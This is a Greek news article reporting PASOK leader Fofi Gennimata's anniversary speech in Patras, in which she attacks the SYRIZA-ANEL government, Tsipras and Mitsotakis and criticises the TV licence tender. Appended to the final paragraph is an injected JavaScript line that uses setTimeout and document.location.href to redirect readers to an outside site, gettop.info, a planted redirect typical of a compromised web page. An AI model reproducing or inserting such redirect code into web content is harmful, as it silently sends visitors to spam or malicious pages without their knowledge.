Γεννηματά: Η πολιτική απάτη έχει πια στην Ελλάδα ονοματεπώνυμο, ΣΥΡΙΖΑ-ΑΝΕΛ

0
5

 

 Σαράντα δύο χρόνια γιορτάζει σήμερα το ΠΑΣΟΚ από την ημέρα ίδρυσής του και η πρόεδρός του Φώφη Γεννηματά μίλησε σε ανοικτή εκδήλωση στην Πάτρα, την οποία διοργάνωσε το Ινστιτούτο Στρατηγικών και Αναπτυξιακών Μελετών Ανδρέας Παπανδρέου.

Η κυρία Γεννηματά τόνισε: «Είναι η ώρα της δράσης και της ανατροπής, διότι το ζητούμενο δεν είναι η επιστροφή σε κάποιο δήθεν ιδανικό ΠΑΣΟΚ του παρελθόντος, ούτε ασφαλώς η αυτοκατάργησή μας, όπως πολλοί ήθελαν και θέλουν, ίσως για να δικαιώσουν τις προσωπικές τους επιλογές. Η ιστορική ευθύνη που ακουμπά στους ώμους όλων μας, είναι να αναστήσουμε πολιτικά τη μεγάλη δημοκρατική παράταξη, ώστε να αναλάβει αναγεννημένη κι ανανεωμένη τα ηνία της τύχης της πατρίδας μας».

Όπως πρόσθεσε η πρόεδρος του ΠΑΣΟΚ, «μέρα με τη μέρα η φωνή μας, η φωνή του ΠΑΣΟΚ, η φωνή της δημοκρατικής παράταξης ακούγεται όλο και πιο δυνατά, όλο και πιο καθαρά, αλλαγή παντού, για να βγούμε μπροστά» και υπογράμμισε πως «το ΠΑΣΟΚ ήταν, είναι και θα είναι ο πολιτικός φορέας της αλλαγής και της προόδου».

Επίσης, η κυρία Γεννηματά επιτέθηκε στον πρωθυπουργό λέγοντας μεταξύ άλλων: «Τι θα βγει να μας πει σε λίγες μέρες ο κ. Τσίπρας από το βήμα της ΔΕΘ; Με ποια αξιοπιστία θα μιλήσει; Ποιος μπορεί πλέον να πιστέψει έναν πρωθυπουργό που η διακυβέρνησή του είναι ρεσιτάλ κωλοτούμπας; Η πολιτική απάτη έχει πια στην Ελλάδα ονοματεπώνυμο. ΣΥΡΙΖΑ – ΑΝΕΛ». Επίσης, η Φώφη Γεννηματά κατηγόρησε τον Αλέξη Τσίπρα, ότι «βάζει ακόμη πιο γερές αλυσίδες ύφεσης κι εξάρτησης» και πρόσθεσε: «Θα βγει να υποσχεθεί «δίκαιη ανάπτυξη», αλλά τώρα όλοι πλέον ξέρουμε, πως αυτό θα σημαίνει περαιτέρω μαζικοποίηση της φτώχειας. Δεν προστατεύει τους φτωχούς. Φτωχοποιεί όλο και περισσότερους».

Ακόμη, η πρόεδρος του ΠΑΣΟΚ είπε ότι ο πρωθυπουργός «δοκιμάζει ξανά την εμπιστοσύνη στις σχέσεις της χώρας με τους εταίρους της, σιγοντάροντας το σενάριο της παραποίησης των στατιστικών στοιχείων». Μάλιστα, όπως είπε «ο πρωθυπουργός το κάνει αυτό, για να φορτώσει την ευθύνη της χρεοκοπίας της χώρας στο ΠΑΣΟΚ και να καλύψει τον αληθινά υπεύθυνο». Όπως ανέφερε, «κουβέντα δε λέει ο κ. Τσίπρας για τις ευθύνες της κυβέρνησης της ΝΔ το 2004-2009, της κυβέρνησης Καραμανλή, που εκτόξευσε το έλλειμμα».

Στη συνέχεια η Φώφη Γεννηματά επιτέθηκε στον πρόεδρο της Νέας Δημοκρατίας Κυριάκο Μητσοτάκη, τον οποίο κάλεσε να κάνει αυτοκριτική «για τα λάθη της παράταξής του» και πρόσθεσε: «Έχει πάθει γλωσσοδέτη. Η σιωπή δεν είναι χρυσός. Δεν μπορεί όλα να μπαίνουν «κάτω από το χαλί», για να μην διαταράξει την εσωκομματική του ισορροπία. Αν σήμερα δεν τολμά, τι μπορεί να προσδοκά κανείς αύριο».

Σχετικά, με τον διαγωνισμό για τις τηλεοπτικές άδειες, η Φώφη Γεννηματά είπε ότι «η πολυδιαφημισμένη τάξη που θα έβαζε η κυβέρνηση στο τηλεοπτικό τοπίο, κατέληξε τακτοποίηση της αριστερής διαπλοκής και ζούμε ξανά την εποχή των κουμπάρων».

«Αντί για πολυφωνία», πρόσθεσε η πρόεδρος του ΠΑΣΟΚ, «έχουμε ολιγοπώλια στα γερά πορτοφόλια και χιλιάδες άνθρωποι είναι πλέον αντιμέτωποι με την ανεργία». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here